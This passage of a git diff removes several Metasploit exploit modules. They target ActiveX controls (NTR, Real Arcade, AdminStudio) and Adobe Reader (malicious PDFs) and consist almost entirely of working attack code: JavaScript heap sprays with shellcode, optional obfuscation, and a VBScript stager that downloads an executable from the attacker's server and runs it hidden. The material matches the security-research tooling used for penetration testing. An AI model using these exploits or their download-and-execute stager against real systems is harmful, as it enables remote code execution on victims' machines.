||||
020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
|
||||
020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219
|
||||
|
||||
=end
|
|
@ -1,200 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "7.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
|
||||
# :method => "StopModule",
|
||||
# :rank => NormalRanking
|
||||
#})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NTR ActiveX Control StopModule() Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
|
||||
vulnerability exists in the StopModule() method, where the lModule parameter is
|
||||
used to dereference memory to get a function pointer, which leads to code execution
|
||||
under the context of the user visiting a malicious web page.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Carsten Eiram', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-0267' ],
|
||||
[ 'OSVDB', '78253' ],
|
||||
[ 'BID', '51374' ],
|
||||
[ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => ""
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# NTR ActiveX 1.1.8.0
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
|
||||
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
|
||||
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4'} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jan 11 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
], self.class
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
def get_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < 500; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
|
||||
return targets[1] #IE 6 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[3] #IE 7 on Windows Vista SP2
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
print_status("User-agent: #{agent}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have a setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
p = payload.encoded
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
|
||||
js = get_spray(my_target, js_code, js_nops)
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
address = 0x0c0c0c0c / 0x134
|
||||
|
||||
html = <<-MYHTML
|
||||
<html>
|
||||
<body>
|
||||
<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
|
||||
<script>
|
||||
#{js}
|
||||
test.StopModule(#{address});
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
MYHTML
|
||||
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
|
||||
print_status("Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
The pointer is "controlled" here:
|
||||
|
||||
.text:10004449 mov eax, [ebp+arg_0] ; arg_0 is user controlled
|
||||
.text:1000444C imul eax, 134h ; it looks good
|
||||
.text:10004452 lea esi, [eax+edi] ; eax is user controlled
|
||||
.text:10004452 ; edi is a heap pointer initialized while activex loading
|
||||
.text:10004452 ; (Important note: the default heap isn't being used)
|
||||
.text:10004452 ;
|
||||
.text:10004452 ; edi:
|
||||
.text:10004452 ;
|
||||
.text:10004452 ; 0:000> !heap -p -a edi
|
||||
.text:10004452 ; address 01fb370c found in
|
||||
.text:10004452 ; _HEAP @ 1fb0000
|
||||
.text:10004452 ; HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
|
||||
.text:10004452 ; 01fb3668 0373 0000 [01] 01fb3670 01b90 - (busy)
|
||||
.text:10004452 ; ? ntractivex118!DllUnregisterServer+10d18
|
||||
.text:10004452 ;
|
||||
.text:10004452 ; Initialization (while activex loading):
|
||||
.text:10004452 ; ChildEBP RetAddr Args to Child
|
||||
.text:10004452 ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
|
||||
.text:10004452 ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
|
||||
.text:10004452 ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
|
||||
.text:10004452 ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114
|
||||
|
||||
And user to get RCE here:
|
||||
|
||||
.text:1000446E mov eax, [esi+24h] ; esi can be user influenced
|
||||
.text:10004471 test eax, eax
|
||||
.text:10004473 jz short loc_10004477
|
||||
.text:10004475 call eax ; RCE!
|
||||
|
||||
=end
|
|
@ -1,108 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec"
|
||||
function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands
|
||||
on the victim machine.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'rgod', #Initial discovery, poc
|
||||
'sinn3r', #msf
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '71559' ],
|
||||
[ 'EDB', '17105' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal', {} ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 3 2011',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
# Unfortunately if we echo the vbs cmdstager too many times, we tend to have random missing lines in
|
||||
# either the payload or the vbs script. To avoid this problem, I ended up writing this custom routine
|
||||
# that only uses one echo.
|
||||
def build_vbs(url, payload_name, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
|
||||
tmp = "#{@temp_folder}/#{stager_name}"
|
||||
|
||||
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"\"Microsoft.XMLHTTP\"\") "
|
||||
vbs << ": #{name_xmlhttp}.open \"\"GET\"\",\"\"http://#{url}\"\",False : #{name_xmlhttp}.send"
|
||||
vbs << ": Set #{name_adodb} = CreateObject(\"\"ADODB.Stream\"\") "
|
||||
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
|
||||
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
|
||||
vbs << ": #{name_adodb}.SaveToFile \"\"#{@temp_folder}/#{payload_name}.exe\"\",2 "
|
||||
vbs << ": CreateObject(\"\"WScript.Shell\"\").Run \"\"#{@temp_folder}/#{payload_name}.exe\"\",0 >> #{tmp}"
|
||||
|
||||
return vbs
|
||||
end
|
||||
|
||||
def exploit
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "C:/Windows/Temp"
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending payload EXE")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
|
||||
# Payload's URL
|
||||
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
|
||||
|
||||
# Create the stager (download + execute payload)
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
stager = build_vbs(payload_src, @payload_name, stager_name)
|
||||
|
||||
html_obj_name = rand_text_alpha(6)
|
||||
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<object classid='clsid:5818813E-D53D-47A5-ABBB-37E2A07056B5' id='#{html_obj_name}' />
|
||||
</object>
|
||||
<script language='vbscript'>
|
||||
#{html_obj_name}.Exec "cmd","/c #{stager}",1,1,""
|
||||
setTimeout "x=1", 3000
|
||||
#{html_obj_name}.Exec "cmd","/c start #{@temp_folder}/#{stager_name}",1,1,""
|
||||
</script>
|
||||
</html>
|
||||
EOS
|
||||
|
||||
# Remove extra tabs
|
||||
html = html.gsub(/^ {4}/, "")
|
||||
|
||||
print_status("Sending #{self.name}")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
|
|
@ -1,163 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The
|
||||
LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run
|
||||
arbitrary commands on the victim machine. This module has been successfully tested with the
|
||||
ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration
|
||||
Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'rgod', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-2657' ],
|
||||
[ 'OSVDB', '76700'],
|
||||
[ 'BID', '50274' ],
|
||||
[ 'ZDI', '11-318' ],
|
||||
[ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1' ],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# LaunchHelp.dll 9.5.0.0
|
||||
[ 'Windows Universal', {} ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 19 2011',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ]),
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
|
||||
])
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type != "meterpreter"
|
||||
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
|
||||
print_error("The vbs stager and exe payload must be removed manually.")
|
||||
return
|
||||
end
|
||||
|
||||
# stdapi must be loaded before we can use fs.file
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
|
||||
begin
|
||||
print_warning("Deleting the vbs payload \"#{@stager_name}\" ...")
|
||||
client.fs.file.rm("#{@temp_folder}/#{@stager_name}")
|
||||
print_good("The vbs stager has been deleted successfully")
|
||||
print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
|
||||
rescue ::Exception => e
|
||||
print_error("Problems while the clenaup")
|
||||
print_status("The vbs stager #{@temp_folder}/#{@stager_name} must be removed manually")
|
||||
print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
|
||||
print_error("Exception: #{e.inspect}")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Stager wrote by sinn3r to avoid problems when echoing the vbs cmdstager too many times.
|
||||
# See "real_arcade_installerdlg.rb" for more information.
|
||||
def build_vbs(url)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
|
||||
tmp = "#{@temp_folder}/#{@stager_name}"
|
||||
|
||||
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
|
||||
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
|
||||
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
|
||||
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
|
||||
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
|
||||
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
|
||||
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
|
||||
return vbs
|
||||
end
|
||||
|
||||
def exploit
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = datastore['WINDOWSTEMP']
|
||||
@stager_name = rand_text_alpha(6) + ".vbs"
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if not agent =~ /MSIE/
|
||||
print_error("Browser not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending payload EXE")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
|
||||
# Payload's URL
|
||||
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
|
||||
|
||||
# Create the stager (download + execute payload)
|
||||
stager = build_vbs(payload_src)
|
||||
|
||||
js = <<-JS
|
||||
var actvx = new ActiveXObject('LaunchHelp.HelpLauncher.1');
|
||||
actvx.LaunchProcess("cmd.exe", '/c #{stager}');
|
||||
actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
|
||||
JS
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
||||
# Remove extra tabs
|
||||
html = html.gsub(/^ {4}/, "")
|
||||
|
||||
print_status("Sending #{self.name}")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
|
|
@ -1,178 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Collab.collectEmailInfo() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.
|
||||
By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2007-5659' ],
|
||||
[ 'OSVDB', '41495' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)', { 'Ret' => '' } ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 8 2008',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Randomize variables
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
rand9 = rand_text_alpha(rand(100) + 1)
|
||||
rand10 = rand_text_alpha(rand(100) + 1)
|
||||
rand11 = rand_text_alpha(rand(100) + 1)
|
||||
rand12 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
script = %Q|
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} ="";
|
||||
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
|
||||
#{rand4} = #{rand2} + #{rand1};
|
||||
#{rand5} = unescape("#{nops}");
|
||||
#{rand6} = 20;
|
||||
#{rand7} = #{rand6}+#{rand4}.length
|
||||
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
|
||||
#{rand8} = #{rand5}.substring(0, #{rand7});
|
||||
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
|
||||
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
|
||||
#{rand10} = new Array();
|
||||
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
|
||||
var #{rand12} = unescape("%u0c0c%u0c0c");
|
||||
while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
|
||||
this.collabStore = Collab.collectEmailInfo({subj: "",msg: #{rand12}});
|
||||
|
|
||||
|
||||
# Create the pdf
|
||||
pdf = make_pdf(script)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
def make_pdf(js)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
# Randomize PDF version?
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
pdf << "%%EOF" << eol
|
||||
|
||||
end
|
||||
end
|
|
@ -1,222 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
|
||||
Professional versions up to and including 9.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Found in the wild
|
||||
# Metasploit version by:
|
||||
'hdm',
|
||||
'pusscat',
|
||||
'jduck'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-4324' ],
|
||||
[ 'BID', '37331' ],
|
||||
[ 'OSVDB', '60980' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# test results (on Windows XP SP3)
|
||||
# reader 6.0.1 - vulnerable / doesn't work
|
||||
# reader 7.0.5 - untested
|
||||
# reader 7.0.8 - untested
|
||||
# reader 7.0.9 - vulnerable / doesn't work
|
||||
# reader 7.1.0 - untested
|
||||
# reader 7.1.1 - untested
|
||||
# reader 8.0.0 - untested
|
||||
# reader 8.1.1 - works
|
||||
# reader 8.1.2 - untested
|
||||
# reader 8.1.3 - untested
|
||||
# reader 8.1.4 - untested
|
||||
# reader 8.1.5 - untested
|
||||
# reader 8.1.6 - untested
|
||||
# reader 9.0.0 - untested
|
||||
# reader 9.1.0 - works
|
||||
# reader 9.2 - works (no debugger, no DEP)
|
||||
[ 'Adobe Reader Windows English (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0c0c0c0c,
|
||||
}
|
||||
],
|
||||
[ 'Adobe Reader Windows German (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0a0a0a0a,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 14 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# Randomize variables
|
||||
#
|
||||
len = 72
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
|
||||
vtbuf = [target.ret].pack('V') * 4
|
||||
vtbuf << rand_text_alpha(len - vtbuf.length)
|
||||
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
retstring = Rex::Text.to_unescape(vtbuf)
|
||||
|
||||
# The printd strings are 72 bytes (??)
|
||||
script = %Q|
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} = unescape("#{nops}");
|
||||
var #{rand3} = unescape("#{retstring}");
|
||||
|
||||
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
|
||||
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
|
||||
|
||||
memory=new Array();
|
||||
|
||||
for(i=0;i<0x2000;i++) {
|
||||
memory[i]= #{rand2} + #{rand1};
